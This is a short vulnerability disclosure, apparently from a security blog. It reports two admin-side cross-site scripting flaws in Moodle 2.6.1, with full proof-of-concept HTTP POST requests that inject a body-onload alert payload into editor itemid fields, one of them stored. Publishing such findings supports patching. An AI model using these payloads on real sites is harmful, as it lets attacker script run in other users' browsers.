Thursday, 27 February 2014

[EN] Moodle 2.6.1 XSS

During my last tests I found that the latest version of Moodle is vulnerable to XSS.

Check it out:

# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27 2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================

[+] From admin user (both requests below are sent with a logged-in admin session and a valid sesskey; the payload sits in the editor's itemid field):

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988

returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361

id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
